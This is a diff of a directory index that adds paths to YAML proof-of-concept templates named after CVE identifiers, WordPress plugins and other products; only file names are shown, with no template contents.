+./poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml
./poc/cve/CVE-2024-12062-e6f7834c3eb1eb9aabc9534922a2b0a2.yaml
./poc/cve/CVE-2024-12062.yaml
./poc/cve/CVE-2024-1207-9fc726e35e00675f40b1bb34bea36c9b.yaml
@@ -35433,11 +35502,13 @@
./poc/cve/CVE-2024-12099.yaml
./poc/cve/CVE-2024-1210-c4ebf3e8de4f3a2f2f0803da094f581c.yaml
./poc/cve/CVE-2024-1210.yaml
+./poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml
./poc/cve/CVE-2024-1212.yaml
./poc/cve/CVE-2024-1213-387a75cacd130bdeb2c4a34a4e878883.yaml
./poc/cve/CVE-2024-1213.yaml
./poc/cve/CVE-2024-1214-054ce8e16369a5701a550443d837348b.yaml
./poc/cve/CVE-2024-1214.yaml
+./poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml
./poc/cve/CVE-2024-1217-e1f7e39e09d8b79f70c462087458d021.yaml
./poc/cve/CVE-2024-1217.yaml
./poc/cve/CVE-2024-1218-b64b71b9fc6a036f1598c987aa88895e.yaml
@@ -41915,6 +41986,7 @@
./poc/cve/CVE-2024-39625-b25ba8a73f9f264b144bb90276b602f4.yaml
./poc/cve/CVE-2024-39625.yaml
./poc/cve/CVE-2024-39626-20d49ce68014b0f52f776e030e83d1bf.yaml
+./poc/cve/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
./poc/cve/CVE-2024-39626.yaml
./poc/cve/CVE-2024-39627-4a34ef4adb6554c40e87a30e6b5db2d1.yaml
./poc/cve/CVE-2024-39627.yaml
@@ -42239,6 +42311,7 @@
./poc/cve/CVE-2024-4270-71a1f1fa5a88ca9142d08468825f0f57.yaml
./poc/cve/CVE-2024-4270.yaml
./poc/cve/CVE-2024-4271-5b99ce1eaa772815cebbffa47f093c3a.yaml
+./poc/cve/CVE-2024-4271-7e84de8005b7402b3460842595eb6a21.yaml
./poc/cve/CVE-2024-4271.yaml
./poc/cve/CVE-2024-4272-ef148fde91b51decc3d6faaca1daa993.yaml
./poc/cve/CVE-2024-4272.yaml
@@ -43368,6 +43441,7 @@
./poc/cve/CVE-2024-46310.yaml
./poc/cve/CVE-2024-4632-2982e52fcd530894d6da3d0a4da476c6.yaml
./poc/cve/CVE-2024-4632.yaml
+./poc/cve/CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f.yaml
./poc/cve/CVE-2024-4634-734ec62f32f11cbd9efc436f0848d6e8.yaml
./poc/cve/CVE-2024-4634.yaml
./poc/cve/CVE-2024-4635-2a85fcbb7b4e2f404f278b3986d6e5c7.yaml
@@ -43901,6 +43975,7 @@
./poc/cve/CVE-2024-49231-4ca493e2a7410e05ce9e0c993ca6adbd.yaml
./poc/cve/CVE-2024-49231.yaml
./poc/cve/CVE-2024-49232-48b5fae78b5aebab16a53c10ca765c28.yaml
+./poc/cve/CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46.yaml
./poc/cve/CVE-2024-49232.yaml
./poc/cve/CVE-2024-49233-261ba1e19db5d8ea0ca73754d2643b65.yaml
./poc/cve/CVE-2024-49233.yaml
@@ -44248,6 +44323,7 @@
./poc/cve/CVE-2024-49663.yaml
./poc/cve/CVE-2024-49664-adb366394b8166a57ef653ee11820dd5.yaml
./poc/cve/CVE-2024-49664.yaml
+./poc/cve/CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2.yaml
./poc/cve/CVE-2024-49665-96b5484bf4c14562249cedc7230dc2ee.yaml
./poc/cve/CVE-2024-49665.yaml
./poc/cve/CVE-2024-49667-8f698778b7c7d1f92d77acbee88d251f.yaml
@@ -45565,6 +45641,7 @@
./poc/cve/CVE-2024-52434.yaml
./poc/cve/CVE-2024-52435-9e7b393e302a2c2f90e1daf7f3c99acf.yaml
./poc/cve/CVE-2024-52435.yaml
+./poc/cve/CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc.yaml
./poc/cve/CVE-2024-52436-ab10caca0b4421ca608c6032e96ff13b.yaml
./poc/cve/CVE-2024-52436.yaml
./poc/cve/CVE-2024-52437-8045dc1d7e039deefe218726cfd5827e.yaml
@@ -45838,6 +45915,60 @@
./poc/cve/CVE-2024-53735.yaml
./poc/cve/CVE-2024-53736-9a7ae43cdef5a228c03407f042bfbc83.yaml
./poc/cve/CVE-2024-53736.yaml
+./poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml
+./poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml
+./poc/cve/CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d.yaml
+./poc/cve/CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6.yaml
+./poc/cve/CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4.yaml
+./poc/cve/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
+./poc/cve/CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef.yaml
+./poc/cve/CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8.yaml
+./poc/cve/CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b.yaml
+./poc/cve/CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc.yaml
+./poc/cve/CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e.yaml
+./poc/cve/CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5.yaml
+./poc/cve/CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef.yaml
+./poc/cve/CVE-2024-53753-358e653d0dd73eb56688321aaef32145.yaml
+./poc/cve/CVE-2024-53754-493566f1c1a1308e200b9e93498256c2.yaml
+./poc/cve/CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4.yaml
+./poc/cve/CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644.yaml
+./poc/cve/CVE-2024-53757-9e5a50025a96a90d40bab8055add551b.yaml
+./poc/cve/CVE-2024-53758-ebe442ae0c94160a0452474317b40359.yaml
+./poc/cve/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
+./poc/cve/CVE-2024-53760-491bf87c29a91b27218dea79d03b2338.yaml
+./poc/cve/CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a.yaml
+./poc/cve/CVE-2024-53762-f6f324446de244136f8f61b504284d66.yaml
+./poc/cve/CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4.yaml
+./poc/cve/CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668.yaml
+./poc/cve/CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2.yaml
+./poc/cve/CVE-2024-53766-2940cf0523c9b377de42a03a2c813390.yaml
+./poc/cve/CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435.yaml
+./poc/cve/CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6.yaml
+./poc/cve/CVE-2024-53769-15f79e5b8994448885f3d02862f03b54.yaml
+./poc/cve/CVE-2024-53770-dde24fdaf6fdccf92776b21600160051.yaml
+./poc/cve/CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785.yaml
+./poc/cve/CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407.yaml
+./poc/cve/CVE-2024-53773-c70474e6b49675474684415b8bad7136.yaml
+./poc/cve/CVE-2024-53774-eb9fe05556006515a14f186abd44c385.yaml
+./poc/cve/CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600.yaml
+./poc/cve/CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500.yaml
+./poc/cve/CVE-2024-53777-4cd0625e0e16873871e20b7b67514246.yaml
+./poc/cve/CVE-2024-53778-f21730b86a71afb64088be9a871cf272.yaml
+./poc/cve/CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a.yaml
+./poc/cve/CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb.yaml
+./poc/cve/CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6.yaml
+./poc/cve/CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759.yaml
+./poc/cve/CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51.yaml
+./poc/cve/CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684.yaml
+./poc/cve/CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207.yaml
+./poc/cve/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
+./poc/cve/CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a.yaml
+./poc/cve/CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3.yaml
+./poc/cve/CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118.yaml
+./poc/cve/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
+./poc/cve/CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc.yaml
+./poc/cve/CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2.yaml
+./poc/cve/CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6.yaml
./poc/cve/CVE-2024-5382-3f1ae151e74bf3a85689b92b47a722f8.yaml
./poc/cve/CVE-2024-5382.yaml
./poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml
@@ -47480,6 +47611,7 @@
./poc/cve/CVE-2024-8484-aa460791f2945a38184b69190c213c98.yaml
./poc/cve/CVE-2024-8484.yaml
./poc/cve/CVE-2024-8485-2139a808681732f8909df642970ccb77.yaml
+./poc/cve/CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86.yaml
./poc/cve/CVE-2024-8485.yaml
./poc/cve/CVE-2024-8486-41cb8426024ee44780a7b668bca4934f.yaml
./poc/cve/CVE-2024-8486.yaml
@@ -48014,6 +48146,7 @@
./poc/cve/CVE-2024-9267.yaml
./poc/cve/CVE-2024-9269-628eabdc4f57974ee22cd154a1c57075.yaml
./poc/cve/CVE-2024-9269.yaml
+./poc/cve/CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362.yaml
./poc/cve/CVE-2024-9270-fc244377618ef643eb9c5fce0c45beaf.yaml
./poc/cve/CVE-2024-9270.yaml
./poc/cve/CVE-2024-9271-68f72266b66d02364a04b2066207b25f.yaml
@@ -48329,12 +48462,15 @@
./poc/cve/CVE-2024-9703.yaml
./poc/cve/CVE-2024-9704-f21a430d525f14c5222622c2499dbc1f.yaml
./poc/cve/CVE-2024-9704.yaml
+./poc/cve/CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e.yaml
+./poc/cve/CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b.yaml
./poc/cve/CVE-2024-9707-4fb16dfc3a442890f762f60d876d8c4d.yaml
./poc/cve/CVE-2024-9707.yaml
./poc/cve/CVE-2024-9708-4252407ec0b06f7586b8084bffab8674.yaml
./poc/cve/CVE-2024-9708.yaml
./poc/cve/CVE-2024-9756-64a408f630e792f3ff717cc9822672de.yaml
./poc/cve/CVE-2024-9756.yaml
+./poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml
./poc/cve/CVE-2024-9772-5094698925e989ea36420156bd740e26.yaml
./poc/cve/CVE-2024-9772.yaml
./poc/cve/CVE-2024-9775-2f63da9b167b3f63935be0843938ce73.yaml
@@ -48388,10 +48524,12 @@
./poc/cve/CVE-2024-9864.yaml
./poc/cve/CVE-2024-9865-44de46ebb413c021b1f60bc0350545dc.yaml
./poc/cve/CVE-2024-9865.yaml
+./poc/cve/CVE-2024-9866-7390d9a349370910408c5562d135bc89.yaml
./poc/cve/CVE-2024-9867-28418454e7529e38f715c32d4d7e771c.yaml
./poc/cve/CVE-2024-9867.yaml
./poc/cve/CVE-2024-9868-96549eced85be8945967e02f9312fbfb.yaml
./poc/cve/CVE-2024-9868.yaml
+./poc/cve/CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7.yaml
./poc/cve/CVE-2024-9873-c5ed80b51344fca9873ea5af2135924b.yaml
./poc/cve/CVE-2024-9873.yaml
./poc/cve/CVE-2024-9874-bea265a3487d73370d286ee12cf991bf.yaml
@@ -62663,6 +62801,7 @@
./poc/header/reflected-headers.yaml
./poc/header/responsive-header-image-slider-e707d0c350d8dc1c30ea42e9b727161b.yaml
./poc/header/responsive-header-image-slider.yaml
+./poc/header/simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d.yaml
./poc/header/splash-header-ae1af7b8de10cb8ae21a4838e673d47b.yaml
./poc/header/splash-header.yaml
./poc/header/sqli_header (copy 1).yaml
@@ -65590,6 +65729,7 @@
./poc/microsoft/cisco-systems-login.yaml
./poc/microsoft/cluevo-lms-6a1d6ebcef69edeed5f796acb8a5f731.yaml
./poc/microsoft/cluevo-lms-78892043fdf34c1dee70d29718c1a4c1.yaml
+./poc/microsoft/cluevo-lms-ba6446ba5ad9a5f47c413928535e804a.yaml
./poc/microsoft/cluevo-lms.yaml
./poc/microsoft/cms-commander-client-02814a0dc2d4695e21ba04ae5dcb9001.yaml
./poc/microsoft/cms-commander-client-76b931b6fcc8dbcb6e16d1e54df1775e.yaml
@@ -66738,6 +66878,7 @@
./poc/microsoft/plone-cms-detect-9608.yaml
./poc/microsoft/plone-cms-detect-9609.yaml
./poc/microsoft/plone-cms-detect.yaml
+./poc/microsoft/pojo-forms-889210e907a32f3bac90ac14ce08d937.yaml
./poc/microsoft/power-cpms.yaml
./poc/microsoft/power-powerpms.yaml
./poc/microsoft/powercreator-cms-rce-9643.yaml
@@ -67824,6 +67965,7 @@
./poc/open_redirect/edd-conditional-success-redirects-2d0f5856608a10fb29f7e370acc0b71e.yaml
./poc/open_redirect/edd-conditional-success-redirects.yaml
./poc/open_redirect/eelv-redirection-7ba8c53e6fc7be568c3f7112b05c02cb.yaml
+./poc/open_redirect/eelv-redirection.yaml
./poc/open_redirect/elementorpage-open-redirect.yaml
./poc/open_redirect/eps-301-redirects-1bce881a5dd8f75156f2aebf72ebc190.yaml
./poc/open_redirect/eps-301-redirects-2268a5b6fb78d23bad4e5e4d75123bf2.yaml
@@ -81812,6 +81954,7 @@
./poc/other/advanced-text-widget.yaml
./poc/other/advanced-video-player-with-analytics-4dc92a626c4c712947784012a52de87d.yaml
./poc/other/advanced-video-player-with-analytics.yaml
+./poc/other/advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a.yaml
./poc/other/advanced-woo-labels-0a238862578d3a34700f31af1bddcd84.yaml
./poc/other/advanced-woo-labels.yaml
./poc/other/advanced-xml-reader-3261270b5d4d0fde7ff6ce7733883a23.yaml
@@ -81991,6 +82134,7 @@
./poc/other/ai-post-generator.yaml
./poc/other/ai-postpix.yaml
./poc/other/ai-quiz-1dcab1a05f3f74daca66940f53ea0b29.yaml
+./poc/other/ai-quiz-31f0fc808945baa02a83ad64def460f0.yaml
./poc/other/ai-quiz.yaml
./poc/other/ai-responsive-gallery-album-10e9e38adf82d56ccf9c5f84280cc68b.yaml
./poc/other/ai-responsive-gallery-album.yaml
@@ -82886,6 +83030,7 @@
./poc/other/arabic-font.yaml
./poc/other/arbitrary-file-read.yaml
./poc/other/arc.yaml
+./poc/other/arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9.yaml
./poc/other/arcadian-846324c7e6ee105f2a750447d7a4292e.yaml
./poc/other/arcadian-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/arcadian-theme-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -82982,6 +83127,7 @@
./poc/other/armember-membership-c3c10a73e269d56e0c5118a2f877f6e6.yaml
./poc/other/armember-membership-c4c58e1763f0301d804e616f8917ab0e.yaml
./poc/other/armember-membership-d58143355c6e31f8e27e102100f2ee0f.yaml
+./poc/other/armember-membership-f395947e480c6bd2b9668c739bc544ea.yaml
./poc/other/armember-membership-f41c75a30f8586399a23c7c3b4068419.yaml
./poc/other/armember-membership-fc91b32f983201c975f911aefe316678.yaml
./poc/other/armember-membership-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -83730,6 +83876,7 @@
./poc/other/azure-storage-min-tls-version.yaml
./poc/other/azure-storage-network-unrestricted.yaml
./poc/other/azure-storage-public-access.yaml
+./poc/other/azure-storage-sas-leak.yaml
./poc/other/azure-storage-secure-transfer.yaml
./poc/other/azure-storage-table-logging-disabled.yaml
./poc/other/azure-storage-trusted-access-disabled.yaml
@@ -85352,6 +85499,7 @@
./poc/other/build-app-online-32f80df1b109ff22ce643c64f178642d.yaml
./poc/other/build-app-online-5de1f71687a33e4868fd277d07372578.yaml
./poc/other/build-app-online-8ae0a50b0588a016d22cf69f1a56ae45.yaml
+./poc/other/build-app-online-9dd1526748a52141c3bb31208d05fbb4.yaml
./poc/other/build-app-online-ae35b0408f717f09f9e4c38bab10a9b5.yaml
./poc/other/build-app-online-cdccf033d4ef87e79ca2b2f93c7e6f58.yaml
./poc/other/build-app-online.yaml
@@ -86256,6 +86404,7 @@
./poc/other/cf7-mailchimp-e2b56e01ba06c66b8d53d40581b73ce6.yaml
./poc/other/cf7-mailchimp.yaml
./poc/other/cf7-message-filter-a931ef27f1fab66c1eae13c745077459.yaml
+./poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml
./poc/other/cf7-message-filter.yaml
./poc/other/cf7-multi-step-dc451ec0e984e189bd60b12f2825ad31.yaml
./poc/other/cf7-multi-step.yaml
@@ -86755,6 +86904,7 @@
./poc/other/click-to-tweet.yaml
./poc/other/clickbank-ads-clickbank-widget-d6b8359e3e9212d965b0520465799e76.yaml
./poc/other/clickbank-ads-clickbank-widget.yaml
+./poc/other/clickbank-storefront-8afd882eedd0c6f2566c03372054a9da.yaml
./poc/other/clickcease-click-fraud-protection-56fbab53f4737937035a15f411a9fed0.yaml
./poc/other/clickcease-click-fraud-protection-fbabc2b317910d947190a57e8383f638.yaml
./poc/other/clickcease-click-fraud-protection.yaml
@@ -88125,6 +88275,7 @@
./poc/other/cosmetsy-core-063ec1d04fd842700414b0ad7c1028af.yaml
./poc/other/cosmetsy-core.yaml
./poc/other/cosmetsy.yaml
+./poc/other/cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31.yaml
./poc/other/cost-calculator-builder-154b980d5cf1ecad4905d443198a00f7.yaml
./poc/other/cost-calculator-builder-b54885b1516bd4329cc2ac0f1a5c43fe.yaml
./poc/other/cost-calculator-builder-c5eabee15e287e016d57dc31e8627748.yaml
@@ -88230,6 +88381,7 @@
./poc/other/covertvideopress.yaml
./poc/other/cowboys4angels.yaml
./poc/other/cowidgets-elementor-addons-25c2398463a81a51ac170a0036ba7879.yaml
+./poc/other/cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f.yaml
./poc/other/cowidgets-elementor-addons-c186a5dcf674ce82665cc6fd4574d5e9.yaml
./poc/other/cowidgets-elementor-addons.yaml
./poc/other/cox-business-panel.yaml
@@ -88300,6 +88452,7 @@
./poc/other/cpt-shortcode.yaml
./poc/other/cpt-speakers-10bb947de003ffc54edfe54f29153ef3.yaml
./poc/other/cpt-speakers.yaml
+./poc/other/cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857.yaml
./poc/other/cql-native-transport.yaml
./poc/other/cracked-io.yaml
./poc/other/cracked.yaml
@@ -88936,6 +89089,7 @@
./poc/other/daisho-theme-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/daisho-theme.yaml
./poc/other/daisho.yaml
+./poc/other/dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd.yaml
./poc/other/dancepress-trwa-b6aa9eb9d2e2d294e649c12aa7c09049.yaml
./poc/other/dancepress-trwa-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/dancepress-trwa-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -89183,6 +89337,7 @@
./poc/other/depicter-417cbbd434ba5309ae238b4e0375b922.yaml
./poc/other/depicter-458944df26b6f77a25f4f6cb4ce03916.yaml
./poc/other/depicter-717caf8997fe4bffcff5305bfe489c2e.yaml
+./poc/other/depicter-91350bdff3ee5a46d0032f5a28a6265e.yaml
./poc/other/depicter-cd536ae4f4d99d9b5aa3852213f0cd63.yaml
./poc/other/depicter-e261e9b3b325e35b0beae4de9a09a534.yaml
./poc/other/depicter.yaml
@@ -89249,6 +89404,7 @@
./poc/other/devices-b7c5fef4e19b4435bd19c7ddc442fdea.yaml
./poc/other/devices.yaml
./poc/other/devika.yaml
+./poc/other/devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab.yaml
./poc/other/devrant.yaml
./poc/other/devto.yaml
./poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml
@@ -89613,6 +89769,7 @@
./poc/other/donate-button.yaml
./poc/other/donate-extra-1e7bbe461a2be25a1602ea33b01f153b.yaml
./poc/other/donate-extra.yaml
+./poc/other/donate-me-574b61de3d2f5e0e6650c80193c07c44.yaml
./poc/other/donate-with-qrcode-323bdd3633cb652e67eb0962ced13eb5.yaml
./poc/other/donate-with-qrcode-a639148d08d3721b86a0b181900c3cab.yaml
./poc/other/donate-with-qrcode-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -91606,6 +91763,7 @@
./poc/other/essential-blocks-pro-e4ff1e42f6a30273380962b6b0ff9c1f.yaml
./poc/other/essential-blocks-pro.yaml
./poc/other/essential-blocks.yaml
+./poc/other/essential-breadcrumbs-2267a02f90f738f304f189dd1027700a.yaml
./poc/other/essential-content-types-8ca1ca4a446ea27e1e50c6dcc62fa72b.yaml
./poc/other/essential-content-types.yaml
./poc/other/essential-grid-82b5f48c2092879fd968777ee5abef7a.yaml
@@ -91794,6 +91952,7 @@
./poc/other/event-tickets-with-ticket-scanner-6dfff838d33b25cca8f5b75937f78a8f.yaml
./poc/other/event-tickets-with-ticket-scanner-70a154fff277e013948f577e63b65ff7.yaml
./poc/other/event-tickets-with-ticket-scanner-90eaeb74e7b4fe6ad55cbb7a10f06414.yaml
+./poc/other/event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e.yaml
./poc/other/event-tickets-with-ticket-scanner-f7f69a981a1771eefa234b9c717410ee.yaml
./poc/other/event-tickets-with-ticket-scanner-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/event-tickets-with-ticket-scanner-plugin.yaml
@@ -92426,6 +92585,7 @@
./poc/other/fastadmin.yaml
./poc/other/fastbee-arbitrary-file-read.yaml
./poc/other/fastbee.yaml
+./poc/other/fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428.yaml
./poc/other/fastcgi-echo.yaml
./poc/other/fastdup-4d937436569e469e00e1b26c70c6dd2f.yaml
./poc/other/fastdup-d463033e6c4a961471bff9c9179f1c0e.yaml
@@ -92486,6 +92646,7 @@
./poc/other/fcchat.yaml
./poc/other/fckeditor.yaml
./poc/other/fcv.yaml
+./poc/other/fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315.yaml
./poc/other/fd-elementor-imagebox.yaml
./poc/other/fe-oa.yaml
./poc/other/fe-showimageservlet-fileread-1.yaml
@@ -92987,6 +93148,7 @@
./poc/other/flipping-cards-48cb04972328068b7e2bc0222a988f79.yaml
./poc/other/flipping-cards.yaml
./poc/other/flix-ax8-download-read-file.yaml
+./poc/other/flixita-69e3979808a27506066d883a9f8eb4e6.yaml
./poc/other/flo-launch-c0b76e33bba38054d324c4d8061dac74.yaml
./poc/other/flo-launch.yaml
./poc/other/float-menu-2877ccabc6efe9b37f49861c99be049d.yaml
@@ -93126,6 +93288,7 @@
./poc/other/focusblog.yaml
./poc/other/fodors-forum.yaml
./poc/other/fogproject.yaml
+./poc/other/folder-gallery-1e6185b69c7ba994a4d3f38a05160b82.yaml
./poc/other/folders-3ae5f40a47aa8ad98532331e7e55a70f.yaml
./poc/other/folders-4e67014384e0e8ec41ff946cc7f75478.yaml
./poc/other/folders-877efc41c9f6a415b6c29230ae5c516f.yaml
@@ -93639,6 +93802,7 @@
./poc/other/friendly-functions-for-welcart-8ea6e8ad49b596a40632d522f929afa1.yaml
./poc/other/friendly-functions-for-welcart.yaml
./poc/other/friends-413a2ada9a6ce3cb0188478529434f59.yaml
+./poc/other/friends-808e945853b70d97c7af6eefcb7afa6c.yaml
./poc/other/friends.yaml
./poc/other/frigate.yaml
./poc/other/front-editor-1af8103919ae59630fbf391eb8af61df.yaml
@@ -93972,8 +94136,10 @@
./poc/other/gallery-video-plugin.yaml
./poc/other/gallery-video.yaml
./poc/other/gallery-videos-226f65c1e6cdad4d530c652d8ed73929.yaml
+./poc/other/gallery-videos-3ff175744c927034ff36b2d07fcbc5d1.yaml
./poc/other/gallery-videos-613b23cd346bbb0743881b81807572a0.yaml
./poc/other/gallery-videos-b0b3f41392f5d7ed9e53a46ed243de56.yaml
+./poc/other/gallery-videos-f2aafb7e611c06dc54124ab527015f64.yaml
./poc/other/gallery-videos.yaml
./poc/other/gallery-with-thumbnail-slider.yaml
./poc/other/game-debate.yaml
@@ -94562,6 +94728,7 @@
./poc/other/golang-metrics-7765.yaml
./poc/other/golang-metrics.yaml
./poc/other/golangci-lint.yml
+./poc/other/gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929.yaml
./poc/other/gold-addons-for-elementor-90883ca6a8b966ecef7c771640dd74b1.yaml
./poc/other/gold-addons-for-elementor.yaml
./poc/other/gold-price-chart-widget-c9ca1cc4b34f01f4d77bad8d6fa80c9d.yaml
@@ -97583,9 +97750,12 @@
./poc/other/kiteworks-pcn-panel.yaml
./poc/other/kivicare-clinic-management-system-0be13433ec5928ef155f55891fa9e8bf.yaml
./poc/other/kivicare-clinic-management-system-35f9b6be5ee89b50336f9d13e2b5ab03.yaml
+./poc/other/kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b.yaml
./poc/other/kivicare-clinic-management-system-40aceed85c52f061ca831e5be973be51.yaml
+./poc/other/kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31.yaml
./poc/other/kivicare-clinic-management-system-a84919117416d1acaa88edc17f31b472.yaml
./poc/other/kivicare-clinic-management-system-e68c07fce725cfe9b475bc12ee2199ed.yaml
+./poc/other/kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c.yaml
./poc/other/kivicare-clinic-management-system.yaml
./poc/other/kiwi-logo-carousel-08b2f14f524c2d5e63b61c362755a54c.yaml
./poc/other/kiwi-logo-carousel.yaml
@@ -98164,6 +98334,8 @@
./poc/other/lenovo-thinkserver-panel.yaml
./poc/other/lenovo-thinkserver.yaml
./poc/other/lenovo-防火墙.yaml
+./poc/other/lenxel-core-4972ccccaaba94b2ac118dc56066bfe6.yaml
+./poc/other/lenxel-core-c40309757059a7c5f5e2a082116ad730.yaml
./poc/other/lenxel-core.yaml
./poc/other/leostream-panel-8609.yaml
./poc/other/leostream-panel-8610.yaml
@@ -98517,6 +98689,7 @@
./poc/other/llmnr-disabled.yaml
./poc/other/lm-hash-storage-enabled.yaml
./poc/other/lnmp.yaml
+./poc/other/load-more-posts-f94901beaffb62ce5c913ef672f4eb96.yaml
./poc/other/loading-page-703919aaf3ac5207e458fe86bf1026b0.yaml
./poc/other/loading-page.yaml
./poc/other/loan-comparison-6d6609133b2e31f690e9731d2bd80de9.yaml
@@ -98882,6 +99055,7 @@
./poc/other/mail-masta.yaml
./poc/other/mail-on-update-806bdc3fd64d48d16ed3401957ed4104.yaml
./poc/other/mail-on-update.yaml
+./poc/other/mail-picker-303b0f9000254327c2e69e892380ecb9.yaml
./poc/other/mail-queue.yaml
./poc/other/mail-subscribe-list-12bb8884aa3aaa7f2d5c840ebe44a35d.yaml
./poc/other/mail-subscribe-list-26b2f7fb87ecdd3c2680bb9f38e5209c.yaml
@@ -99703,6 +99877,7 @@
./poc/other/meeting-scheduler-by-vcita-4cdae8691afad706d770724c4a36e255.yaml
./poc/other/meeting-scheduler-by-vcita-6cf5c63439a5551d25ba160189955a61.yaml
./poc/other/meeting-scheduler-by-vcita-79ce83ee6cac9f72c630a7e89dc6ffd3.yaml
+./poc/other/meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41.yaml
./poc/other/meeting-scheduler-by-vcita-84ac44ede425ec37bd9dd01a4768765b.yaml
./poc/other/meeting-scheduler-by-vcita-a3c92bcf9826043ce97f5549811055fd.yaml
./poc/other/meeting-scheduler-by-vcita-b6045533aa76a48e4827e89274e42f23.yaml
@@ -100154,6 +100329,7 @@
./poc/other/miniorange-saml-20-single-sign-on-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/miniorange-saml-20-single-sign-on-plugin.yaml
./poc/other/miniorange-saml-20-single-sign-on.yaml
+./poc/other/mins-to-read-2941ea333622216e1c6091029b0b178a.yaml
./poc/other/mintme.yaml
./poc/other/minus-50709d48b6148ecbab70774ec662851c.yaml
./poc/other/minus-7a56cf17d477d3137dedce46dcb62586.yaml
@@ -101303,11 +101479,13 @@
./poc/other/newsmag-f3f203d9ab101f9d04ccf12ec6b5d164.yaml
./poc/other/newsmag.yaml
./poc/other/newsmash-40bc3abb5400677523e2ad7a6261fa5e.yaml
+./poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml
./poc/other/newsmash.yaml
./poc/other/newsmatic-7f04fe0b571a41ddada248b3475a29ce.yaml
./poc/other/newsmatic-c2883a60e880da757a0feabedd524744.yaml
./poc/other/newsmatic.yaml
./poc/other/newsmunch-1eae09198c1f57697be0e29290d91cd2.yaml
+./poc/other/newsmunch.yaml
./poc/other/newspack-ads-7cdcff626ec5e14115be00e6ae55d55d.yaml
./poc/other/newspack-ads.yaml
